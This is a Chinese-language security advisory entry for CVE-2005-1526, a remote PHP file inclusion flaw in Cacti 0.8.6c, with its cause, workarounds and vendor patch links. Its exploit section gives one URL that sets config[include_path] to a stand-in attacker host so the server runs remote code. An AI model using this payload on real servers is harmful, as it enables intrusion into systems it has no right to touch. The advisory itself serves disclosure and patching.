添加时间:
2008-10-02

系统编号:
WAVDB-00842
BugCVE: CVE-2005-1526
BUGTRAQ: 14028

影响版本:
Raxnet Cacti 0.8.6c

程序介绍:

Cacti是一款轮循数据库（RRD）工具，可帮助从数据库信息创建图形，有多个Linux版本。

漏洞分析:

Cacti的config_settings.php脚本中存在输入验证错误，可能允许攻击者包含远程站点的任意PHP代码，这可能导致以Web Server进程权限执行任意命令。 漏洞起因是脚本盲目信任用户所提供的include_path变量。

漏洞利用:

http://example.com/include/config_settings.php?config[include_path]=http://attackersite.com/

解决方案:
临时解决方法：
如果您不能立刻安装补丁或者升级，建议您采取以下措施以降低威胁：
* 对访问Cacti安装要求认证；将对使用Cacti的web server的访问仅限于可信任的主机。

厂商补丁：
Gentoo
------
Gentoo已经为此发布了一个安全公告（GLSA-200506-20）以及相应补丁:
GLSA-200506-20：Cacti: Several vulnerabilities
链接：http://security.gentoo.org/glsa/glsa-200506-20.xml
所有Cacti用户都应升级到最新版本:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-analyzer/cacti-0.8.6e"

Raxnet
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载cacti 0.8.6e版本：
http://www.cacti.net/downloads/cacti-0.8.6e.tar.gz
http://www.cacti.net/downloads/cacti-0.8.6e.zip

信息来源:
<*来源：Maciej Piotr Falkiewicz

链接：http://www.cacti.net/release_notes_0_8_6e.php
http://www.idefense.com/applicat ... es&flashstatus=true
http://security.gentoo.org/glsa/glsa-200506-20.xml
*>